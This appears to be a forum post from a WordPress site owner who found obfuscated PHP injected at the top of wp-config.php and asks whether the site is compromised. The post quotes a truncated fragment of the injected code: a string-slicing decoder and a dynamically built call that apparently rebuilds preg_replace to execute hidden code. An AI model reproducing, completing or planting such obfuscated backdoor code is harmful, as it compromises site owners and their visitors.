I hadn’t realized that one of my WP sites wasn’t being accessed in the last months, and consequently not being updated, and today I have found that my config.php
has some garbage in the beginning of the file:
<?php $uqnrguvics="x7825r% ... more garbage ...
825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y3/(.*)/epreg_replacezrxmuexghf";
$uvozcxjtxg = explode(chr((253-209)),'4137,25,2713,60,8524,67 ... more garbage ...
'); $tuyrkvuamr=substr($uqnrguvics,(49619-39513),(27-20));
if (!function_exists('zpjgeglbtt')) { function zpjgeglbtt($lwtbhpepkn, $lkvuvnwcsu) {
$sblzyeefjv = NULL; for($mxodybdogx=0;$mxodybdogx<(sizeof($lwtbhpepkn)/2);$mxodybdogx++)
{ $sblzyeefjv .= substr($lkvuvnwcsu, $lwtbhpepkn[($mxodybdogx*2)],
$lwtbhpepkn[($mxodybdogx*2)+1]); }
return $sblzyeefjv; };} $rudmfyfhqb="\ x20\57... hex garbage ... \52\x2f\40";
$vkyezvmvec=substr($uqnrguvics,(42452-32339),(65-53));
$vkyezvmvec($tuyrkvuamr, $rudmfyfhqb, NULL); $vkyezvmvec=$rudmfyfhqb;
$vkyezvmvec=(811-690); $uqnrguvics=$vkyezvmvec-1; ?>
<?php
HERE comes an usual wp-config.php, which as far as I remember is the one I had before
The file also has DOS encoding, although I’m running it on Linux.
(I have included line breaks).
Does this mean this installation has been compromised? Or is this something automatically included by WP somehow?
If it was, is it enough to just change the admin password? Logging in as admin doesn’t show anything unusual.